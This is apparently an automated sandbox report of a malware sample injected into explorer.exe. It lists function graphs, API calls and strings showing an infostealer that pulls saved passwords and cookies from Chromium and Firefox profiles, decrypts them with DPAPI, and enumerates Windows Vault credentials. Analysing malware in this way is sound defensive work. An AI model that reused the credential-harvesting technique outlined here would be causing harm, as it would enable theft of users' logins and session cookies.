28099->28100 28101 8047af 28100->28101 28102 8047f1 28101->28102 28103 80199d 9 API calls 28101->28103 28102->28095 28104 8047bf 28103->28104 28105 8047ea 28104->28105 28107 801d4a 18 API calls 28104->28107 28106 801011 3 API calls 28105->28106 28106->28102 28107->28104 28193 816d01 _allmul 27373 869304 27374 869344 27373->27374 27375 8694da LoadLibraryA 27374->27375 27378 869584 27374->27378 27380 86951f VirtualProtect VirtualProtect 27374->27380 27376 8694f1 27375->27376 27376->27374 27379 869503 GetProcAddress 27376->27379 27378->27378 27379->27376 27381 869519 27379->27381 27380->27378 28296 836f06 24 API calls 27450 804108 27453 804045 27450->27453 27472 803fdc 27453->27472 27456 803fdc 50 API calls 27457 80407a 27456->27457 27458 803fdc 50 API calls 27457->27458 27459 80408d 27458->27459 27460 803fdc 50 API calls 27459->27460 27461 8040a0 27460->27461 27462 803fdc 50 API calls 27461->27462 27463 8040b3 27462->27463 27464 803fdc 50 API calls 27463->27464 27465 8040c6 27464->27465 27466 803fdc 50 API calls 27465->27466 27467 8040d9 27466->27467 27468 803fdc 50 API calls 27467->27468 27469 8040ec 27468->27469 27470 803fdc 50 API calls 27469->27470 27471 8040ff 27470->27471 27473 801afe 10 API calls 27472->27473 27474 803fea 27473->27474 27475 80403f 27474->27475 27476 80199d 9 API calls 27474->27476 27475->27456 27477 803ff8 27476->27477 27483 803ed9 27477->27483 27480 804038 27482 801011 3 API calls 27480->27482 27482->27475 27484 803fd1 27483->27484 27485 803eed 27483->27485 27484->27480 27505 801d4a 27484->27505 27485->27484 27533 801000 GetProcessHeap RtlAllocateHeap 27485->27533 27487 803f01 PathCombineW FindFirstFileW 27488 803f27 27487->27488 27489 803fca 27487->27489 27490 803f32 lstrcmpiW 27488->27490 27491 803f78 lstrcmpiW 27488->27491 27534 801000 GetProcessHeap RtlAllocateHeap 27488->27534 27492 801011 3 API calls 27489->27492 27493 803f42 lstrcmpiW 27490->27493 27494 803faf FindNextFileW 27490->27494 27491->27488 27491->27494 27492->27484 27493->27494 27496 803f56 27493->27496 27494->27488 27495 803fc3 FindClose 27494->27495 27495->27489 27551 801000 GetProcessHeap RtlAllocateHeap 27496->27551 27498 803f92 PathCombineW 27535 803e04 27498->27535 27501 803f60 PathCombineW 27503 803ed9 23 API calls 27501->27503 27502 803f76 27504 801011 3 API calls 27502->27504 27503->27502 27504->27494 27506 801d62 27505->27506 27507 801eb4 27505->27507 27506->27507 27578 8019b4 27506->27578 27507->27480 27510 801d79 27512 801953 6 API calls 27510->27512 27511 801d8b 27513 801953 6 API calls 27511->27513 27514 801d83 27512->27514 27513->27514 27514->27507 27515 801da3 FindFirstFileW 27514->27515 27516 801ead 27515->27516 27522 801dba 27515->27522 27517 801011 3 API calls 27516->27517 27517->27507 27518 801dc5 lstrcmpiW 27519 801ddd lstrcmpiW 27518->27519 27520 801e8e FindNextFileW 27518->27520 27519->27520 27530 801df5 27519->27530 27520->27522 27523 801ea2 FindClose 27520->27523 27521 801953 6 API calls 27521->27522 27522->27518 27522->27521 27524 80199d 9 API calls 27522->27524 27523->27516 27526 801e54 lstrcmpiW 27524->27526 27525 8019b4 lstrlenW 27525->27530 27526->27530 27528 801011 3 API calls 27528->27520 27529 801953 6 API calls 27529->27530 27530->27525 27530->27528 27530->27529 27531 80199d 9 API calls 27530->27531 27532 801d4a 12 API calls 27530->27532 27582 801cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27530->27582 27531->27530 27532->27530 27533->27487 27534->27498 27536 801b6a 2 API calls 27535->27536 27537 803e0f 27536->27537 27548 803ec7 27537->27548 27552 801c31 CreateFileW 27537->27552 27543 803ebf 27545 801011 3 API calls 27543->27545 27545->27548 27546 803ea8 27550 801011 3 API calls 27546->27550 27547 803e6c RtlCompareMemory 27547->27546 27549 803e7e CryptUnprotectData 27547->27549 27548->27502 27549->27546 27550->27543 27551->27501 27553 801c53 GetFileSize 27552->27553 27554 801c98 27552->27554 27555 801c90 CloseHandle 27553->27555 27556 801c63 27553->27556 27554->27548 27563 802fb1 27554->27563 27555->27554 27575 801000 GetProcessHeap RtlAllocateHeap 27556->27575 27558 801c6b ReadFile 27559 801c80 27558->27559 27560 801c87 27558->27560 27559->27555 27559->27560 27561 801011 3 API calls 27560->27561 27562 801c8e 27561->27562 27562->27555 27564 802ff2 27563->27564 27565 802fb8 StrStrIA 27563->27565 27564->27548 27569 80123b lstrlen 27564->27569 27565->27564 27566 802fcd lstrlen StrStrIA 27565->27566 27566->27564 27567 802fe7 27566->27567 27576 80190b 6 API calls 27567->27576 27570 801256 CryptStringToBinaryA 27569->27570 27571 80129b 27569->27571 27570->27571 27572 801272 27570->27572 27571->27543 27571->27546 27571->27547 27577 801000 GetProcessHeap RtlAllocateHeap 27572->27577 27574 80127e CryptStringToBinaryA 27574->27571 27575->27558 27576->27564 27577->27574 27579 8019d4 27578->27579 27580 8019bc 27578->27580 27579->27510 27579->27511 27580->27579 27581 8019c3 lstrlenW 27580->27581 27581->27579 27582->27530 28297 825f08 102 API calls 27608 802b15 27609 801953 6 API calls 27608->27609 27610 802b1f FindFirstFileW 27609->27610 27612 802c5c 27610->27612 27631 802b4e 27610->27631 27613 801011 3 API calls 27612->27613 27615 802c63 27613->27615 27614 802b59 lstrcmpiW 27617 802b71 lstrcmpiW 27614->27617 27618 802c3d FindNextFileW 27614->27618 27619 801011 3 API calls 27615->27619 27616 801953 6 API calls 27616->27631 27617->27618 27617->27631 27620 802c51 FindClose 27618->27620 27618->27631 27621 802c6a 27619->27621 27620->27612 27622 80199d 9 API calls 27624 802bdf StrStrIW 27622->27624 27623 8019b4 lstrlenW 27623->27631 27625 802c10 StrStrIW 27624->27625 27628 802bf1 27624->27628 27625->27628 27626 801cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27626->27628 27627 801011 3 API calls 27627->27618 27628->27625 27628->27626 27628->27627 27633 80278e 41 API calls 27628->27633 27630 80199d 9 API calls 27630->27631 27631->27614 27631->27616 27631->27622 27631->27623 27631->27630 27632 801011 3 API calls 27631->27632 27632->27631 27633->27625 28298 826b14 memset memcpy _allmul 27634 803717 27635 801b6a 2 API calls 27634->27635 27637 80372e 27635->27637 27636 803c23 27637->27636 27684 801000 GetProcessHeap RtlAllocateHeap 27637->27684 27639 80376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27640 8037a8 27639->27640 27641 80379e 27639->27641 27643 854bec 89 API calls 27640->27643 27685 80349b 31 API calls 27641->27685 27646 8037b3 27643->27646 27644 803c15 DeleteFileW 27645 801011 3 API calls 27644->27645 27645->27636 27646->27644 27647 803c0c 27646->27647 27686 801000 GetProcessHeap RtlAllocateHeap 27646->27686 27648 853848 76 API calls 27647->27648 27648->27644 27650 8037e3 27687 8202ec 94 API calls 27650->27687 27652 803bcc 27692 81fb92 93 API calls 27652->27692 27654 803bd9 lstrlen 27655 803c05 27654->27655 27656 803be5 27654->27656 27657 801011 3 API calls 27655->27657 27693 801798 lstrlen 27656->27693 27657->27647 27659 803833 RtlCompareMemory 27660 803a37 CryptUnprotectData 27659->27660 27673 8037ee 27659->27673 27660->27673 27662 803bf3 27694 801798 lstrlen 27662->27694 27664 803bfc 27695 801798 lstrlen 27664->27695 27666 803867 RtlZeroMemory 27688 801000 GetProcessHeap RtlAllocateHeap 27666->27688 27668 801011 3 API calls 27668->27673 27669 801fa7 19 API calls 27669->27673 27670 803b0f lstrlen 27671 803b21 lstrlen 27670->27671 27670->27673 27671->27673 27672 801000 GetProcessHeap RtlAllocateHeap 27672->27673 27673->27652 27673->27659 27673->27660 27673->27666 27673->27668 27673->27669 27673->27670 27673->27672 27674 803987 lstrlen 27673->27674 27678 803ba3 lstrcat 27673->27678 27689 802112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27673->27689 27690 802112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27673->27690 27691 8202ec 94 API calls 27673->27691 27674->27673 27676 803999 lstrlen 27674->27676 27676->27673 27677 803b66 wsprintfA lstrlen 27677->27673 27677->27678 27678->27673 27680 8039de wsprintfA lstrlen 27681 803a1b lstrcat 27680->27681 27682 803a0d 27680->27682 27683 801011 3 API calls 27681->27683 27682->27681 27683->27673 27684->27639 27685->27640 27686->27650 27687->27673 27688->27673 27689->27680 27690->27677 27691->27673 27692->27654 27693->27662 27694->27664 27695->27655 27744 80411b 27745 804045 50 API calls 27744->27745 27746 80412b 27745->27746 27747 804045 50 API calls 27746->27747 27748 80413b 27747->27748 28198 8184a7 30 API calls 28199 809925 18 API calls 28302 84c322 27 API calls 28201 810128 36 API calls 28304 80cb2a _allmul _allmul 28305 83072d 19 API calls 28204 82f130 22 API calls 28306 81ff32 21 API calls 28205 819534 39 API calls 28309 817b3d 18 API calls 28108 80413e 28109 804045 50 API calls 28108->28109 28110 80414e 28109->28110 28311 810f3e 60 API calls 28312 826340 92 API calls 28206 82e141 18 API calls 28314 81f74d 18 API calls 28208 80a558 18 API calls 28209 82e558 22 API calls 28317 837762 memset memset memcpy 28319 827f67 24 API calls 28320 80ab68 22 API calls 28211 835d6f 20 API calls 28212 81a16f 33 API calls 28046 802f77 28047 802e30 22 API calls 28046->28047 28048 802f9a 28047->28048 28049 802e30 22 API calls 28048->28049 28050 802fab 28049->28050 28215 81c97b memcpy

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 803717-803730 call 801b6a 3 803736-80374c 0->3 4 803c37-803c3d 0->4 5 803762-80379c call 801000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 80374e-80375e call 80302d 3->6 11 8037a8-8037b5 call 854bec 5->11 12 80379e-8037a3 call 80349b 5->12 6->5 16 803c15-803c1e DeleteFileW call 801011 11->16 17 8037bb-8037d3 call 83eeb8 11->17 12->11 21 803c23-803c28 16->21 22 8037d9-8037f1 call 801000 call 8202ec 17->22 23 803c0c-803c10 call 853848 17->23 21->4 24 803c2a-803c32 call 802ffa 21->24 31 803bd0-803be3 call 81fb92 lstrlen 22->31 32 8037f7 22->32 23->16 24->4 38 803c05-803c07 call 801011 31->38 39 803be5-803c00 call 801798 * 3 31->39 34 8037fc-803816 call 801fa7 32->34 40 803bb6-803bc6 call 8202ec 34->40 41 80381c-80382d 34->41 38->23 39->38 40->34 55 803bcc 40->55 44 803833-803843 RtlCompareMemory 41->44 45 803a37-803a51 CryptUnprotectData 41->45 44->45 49 803849-80384b 44->49 45->40 51 803a57-803a5c 45->51 49->45 54 803851-803856 49->54 51->40 52 803a62-803a78 call 801fa7 51->52 61 803a86-803a9d call 801fa7 52->61 62 803a7a-803a80 52->62 54->45 58 80385c-803861 54->58 55->31 58->45 60 803867-8038ed RtlZeroMemory call 801000 58->60 73 8038f3-803909 call 801fa7 60->73 74 803a2e-803a32 60->74 68 803aab-803ac2 call 801fa7 61->68 69 803a9f-803aa5 61->69 62->61 64 803a82 62->64 64->61 79 803ad0-803aed call 801fa7 68->79 80 803ac4-803aca 68->80 69->68 71 803aa7 69->71 71->68 84 803917-80392d call 801fa7 73->84 85 80390b-803911 73->85 77 803bb1 call 801011 74->77 77->40 89 803af7-803b01 79->89 90 803aef-803af1 79->90 80->79 83 803acc 80->83 83->79 93 80393b-803952 call 801fa7 84->93 94 80392f-803935 84->94 85->84 88 803913 85->88 88->84 95 803b03-803b05 89->95 96 803b0f-803b1b lstrlen 89->96 90->89 92 803af3 90->92 92->89 103 803960-803979 call 801fa7 93->103 104 803954-80395a 93->104 94->93 97 803937 94->97 95->96 99 803b07-803b0b 95->99 96->40 100 803b21-803b2a lstrlen 96->100 97->93 99->96 100->40 102 803b30-803b4f call 801000 100->102 110 803b51 102->110 111 803b59-803b93 call 802112 wsprintfA lstrlen 102->111 112 803987-803993 lstrlen 103->112 113 80397b-803981 103->113 104->103 106 80395c 104->106 106->103 110->111 118 803ba3-803baf lstrcat 111->118 119 803b95-803ba1 call 80102f 111->119 112->74 115 803999-8039a2 lstrlen 112->115 113->112 116 803983 113->116 115->74 120 8039a8-8039c7 call 801000 115->120 116->112 118->77 119->118 125 8039d1-803a0b call 802112 wsprintfA lstrlen 120->125 126 8039c9 120->126 129 803a1b-803a29 lstrcat call 801011 125->129 130 803a0d-803a19 call 80102f 125->130 126->125 129->74 130->129
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                                • Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 00803778
                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803782
                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 00803789
                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803794
                                                                                                                              • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0080383B
                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 00803870
                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?), ref: 0080398B
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0080399A
                                                                                                                              • wsprintfA.USER32 ref: 008039F1
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 008039FD
                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00803A21
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00803A49
                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00803B13
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00803B22
                                                                                                                              • wsprintfA.USER32 ref: 00803B79
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00803B85
                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00803BA9
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00803BDA
                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00803C16
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                              • API String ID: 584740257-404540950
                                                                                                                              • Opcode ID: 75d1ef4be3ba62f609af73c06c8a22cc8c18686abe529c42bdd63fa3b212714f
                                                                                                                              • Instruction ID: f3fc50ca1f04787e8c570c95102dc0e0f18fdf6fbb0cc1ee03fe35651f9ca419
                                                                                                                              • Opcode Fuzzy Hash: 75d1ef4be3ba62f609af73c06c8a22cc8c18686abe529c42bdd63fa3b212714f
                                                                                                                              • Instruction Fuzzy Hash: 93E17670208341AFEB61DB28CC84A2BBBE9FF85365F44492CF985D7291EB75C904CB52

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 134 802198-8021c9 RtlZeroMemory GetVersionExW 135 8021d7-8021dc 134->135 136 8021cb-8021d0 134->136 138 8021de 135->138 139 8021e3-8021f6 LoadLibraryW 135->139 137 8021d2 136->137 136->138 137->135 138->139 140 80249b-8024a3 139->140 141 8021fc-80223e GetProcAddress * 5 139->141 142 802492-80249a FreeLibrary 141->142 143 802244-80224a 141->143 142->140 143->142 144 802250-802252 143->144 144->142 145 802258-80225a 144->145 145->142 146 802260-802265 145->146 146->142 147 80226b-802277 146->147 148 80227e-802280 147->148 148->142 149 802286-8022a5 148->149 151 80248b-80248f 149->151 152 8022ab-8022b3 149->152 151->142 153 802483 152->153 154 8022b9-8022c5 152->154 153->151 155 8022c9-8022db 154->155 156 8022e1-8022f1 RtlCompareMemory 155->156 157 802365-802375 RtlCompareMemory 155->157 158 802452-802475 156->158 160 8022f7-802348 call 801953 * 3 156->160 157->158 159 80237b-8023c9 call 801953 * 3 157->159 158->155 163 80247b-80247f 158->163 176 8023e4-8023ea 159->176 177 8023cb-8023dc call 801953 159->177 160->176 178 80234e-802363 call 801953 160->178 163->153 181 802431-802433 176->181 182 8023ec-8023ee 176->182 190 8023e0 177->190 178->190 184 802435-802437 call 801011 181->184 185 80243c-80243e 181->185 187 8023f0-8023f2 182->187 188 80242a-80242c call 801011 182->188 184->185 192 802440-802442 call 801011 185->192 193 802447-802449 185->193 187->188 194 8023f4-8023f6 187->194 188->181 190->176 192->193 193->158 197 80244b-80244d call 801011 193->197 194->188 196 8023f8-802406 StrStrIW 194->196 198 802426 196->198 199 802408-802421 call 8017c0 * 3 196->199 197->158 198->188 199->198
                                                                                                                              APIs
                                                                                                                              • RtlZeroMemory.NTDLL(?,00000114), ref: 008021AF
                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 008021BE
                                                                                                                              • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 008021E8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0080220A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00802214
                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00802220
                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0080222A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00802236
                                                                                                                              • RtlCompareMemory.NTDLL(?,00861110,00000010), ref: 008022E8
                                                                                                                              • RtlCompareMemory.NTDLL(?,00861110,00000010), ref: 0080236C
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                              • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 008023FE
                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 00802493
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                              • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                              • API String ID: 2583887280-2831467701
                                                                                                                              • Opcode ID: ffa59101296c5b02a7ad67e6b061039ac6ed3d5a45b3109ca99f12ac92971152
                                                                                                                              • Instruction ID: 2eb6ba1632d1eb56523cecb6c34d845a69a6d74b998298385e88b12553fe5c5b
                                                                                                                              • Opcode Fuzzy Hash: ffa59101296c5b02a7ad67e6b061039ac6ed3d5a45b3109ca99f12ac92971152
                                                                                                                              • Instruction Fuzzy Hash: C9917571A083019FDB58DF65CC88A2BBBE9FF98704F40482DF995D7291EAB4D805CB42

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 261 803098-8030b1 call 801b6a 264 8030b7-8030cd 261->264 265 8033ba-8033c0 261->265 266 8030e3-803128 call 801000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 854bec 264->266 267 8030cf-8030d8 call 80302d 264->267 274 80339b-8033a4 DeleteFileW call 801011 266->274 275 80312e-803146 call 83eeb8 266->275 271 8030dd-8030df 267->271 271->266 279 8033a9-8033ab 274->279 280 803392-803396 call 853848 275->280 281 80314c-803158 call 8202ec 275->281 279->265 282 8033ad-8033b5 call 802ffa 279->282 280->274 287 803389-80338d call 81fb92 281->287 288 80315e-803161 281->288 282->265 287->280 290 803165-80317f call 801fa7 288->290 293 803185-803196 290->293 294 80336f-80337b call 8202ec 290->294 296 80319c-8031ac RtlCompareMemory 293->296 297 8032cd-8032e7 CryptUnprotectData 293->297 294->290 302 803381-803385 294->302 296->297 300 8031b2-8031b4 296->300 297->294 299 8032ed-8032f2 297->299 299->294 303 8032f4-80330a call 801fa7 299->303 300->297 301 8031ba-8031bf 300->301 301->297 304 8031c5-8031ca 301->304 302->287 308 803318-80332f call 801fa7 303->308 309 80330c-803312 303->309 304->297 307 8031d0-803253 RtlZeroMemory call 801000 304->307 319 803255-80326b call 801fa7 307->319 320 8032bd 307->320 315 803331-803337 308->315 316 80333d-803343 308->316 309->308 311 803314 309->311 311->308 315->316 318 803339 315->318 321 803351-80336a call 801798 * 3 316->321 322 803345-80334b 316->322 318->316 330 803279-80328e call 801fa7 319->330 331 80326d-803273 319->331 324 8032c1-8032c8 call 801011 320->324 321->294 322->321 325 80334d 322->325 324->294 325->321 339 803290-803296 330->339 340 80329c-8032bb call 801798 * 3 330->340 331->330 334 803275 331->334 334->330 339->340 341 803298 339->341 340->324 341->340
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                                • Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 008030F9
                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803103
                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0080310A
                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803115
                                                                                                                              • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 008031A4
                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 008031D7
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008032DF
                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0080339C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                              • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                              • API String ID: 2757140130-4052020286
                                                                                                                              • Opcode ID: 002d93b67b561cd551769174205fba6a8dc2b197bb6661dbc5c97f1d2d8c2ac9
                                                                                                                              • Instruction ID: a9c7c23f5bbff027d0cd293ce87033b761df174523df89988dd8a3fb005fc407
                                                                                                                              • Opcode Fuzzy Hash: 002d93b67b561cd551769174205fba6a8dc2b197bb6661dbc5c97f1d2d8c2ac9
                                                                                                                              • Instruction Fuzzy Hash: E1919670208341ABDB919F28DC84A2FBBE9FF85755F04492DF985D32A1DB34DA048B23

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 413 803ed9-803ee7 414 803fd1-803fdb 413->414 415 803eed-803ef1 413->415 415->414 416 803ef7-803f21 call 801000 PathCombineW FindFirstFileW 415->416 419 803f27-803f30 416->419 420 803fca-803fcc call 801011 416->420 421 803f32-803f40 lstrcmpiW 419->421 422 803f78-803f86 lstrcmpiW 419->422 420->414 424 803f42-803f54 lstrcmpiW 421->424 425 803faf-803fbd FindNextFileW 421->425 422->425 426 803f88-803fa3 call 801000 PathCombineW call 803e04 422->426 424->425 428 803f56-803f76 call 801000 PathCombineW call 803ed9 424->428 425->419 427 803fc3-803fc4 FindClose 425->427 434 803fa8-803faa call 801011 426->434 427->420 428->434 434->425
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00803F0A
                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00803F16
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562CC), ref: 00803F38
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562D0), ref: 00803F4C
                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00803F69
                                                                                                                              • lstrcmpiW.KERNEL32(?,Local State), ref: 00803F7E
                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00803F9B
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00803FB5
                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00803FC4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                              • String ID: *.*$Local State
                                                                                                                              • API String ID: 3923353463-3324723383
                                                                                                                              • Opcode ID: 0214a0c806dbe5743da91bacb5d09593d6aec333e592c00b8e1235d05edacd5d
                                                                                                                              • Instruction ID: 371d45c1242b5fbee66a57b3ac8c0b02cef52bbce09ccf4102a636bf79242c54
                                                                                                                              • Opcode Fuzzy Hash: 0214a0c806dbe5743da91bacb5d09593d6aec333e592c00b8e1235d05edacd5d
                                                                                                                              • Instruction Fuzzy Hash: 6821B030600B456BE790BB349C4CA3B76BCFB81752F840529F952C32D2FF7C99588662

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 438 802b15-802b48 call 801953 FindFirstFileW 442 802c5c-802c74 call 801011 * 2 438->442 443 802b4e 438->443 444 802b52-802b57 443->444 446 802bc8-802bef call 801953 call 80199d StrStrIW 444->446 447 802b59-802b6b lstrcmpiW 444->447 461 802c10-802c1e StrStrIW 446->461 462 802bf1-802bfa call 801cf7 446->462 450 802b71-802b83 lstrcmpiW 447->450 451 802c3d-802c4b FindNextFileW 447->451 450->451 454 802b89-802b94 call 8019b4 450->454 451->444 455 802c51-802c58 FindClose 451->455 463 802b96-802b9b 454->463 464 802b9d 454->464 455->442 467 802c20-802c29 call 801cf7 461->467 468 802c36-802c38 call 801011 461->468 462->461 473 802bfc-802c0b call 80278e 462->473 466 802b9f-802bc3 call 801953 call 80199d call 802ae9 call 801011 463->466 464->466 466->446 467->468 478 802c2b-802c31 call 80287d 467->478 468->451 473->461 478->468
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00802B3D
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562CC), ref: 00802B63
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562D0), ref: 00802B7B
                                                                                                                                • Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4
                                                                                                                              • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00802BE7
                                                                                                                              • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00802C16
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00802C43
                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00802C52
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                              • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                              • API String ID: 1108783765-3717368146
                                                                                                                              • Opcode ID: d04d673d4ca8a8abb742ae0d80be0df8476515d24161e36d97e262f8dde32171
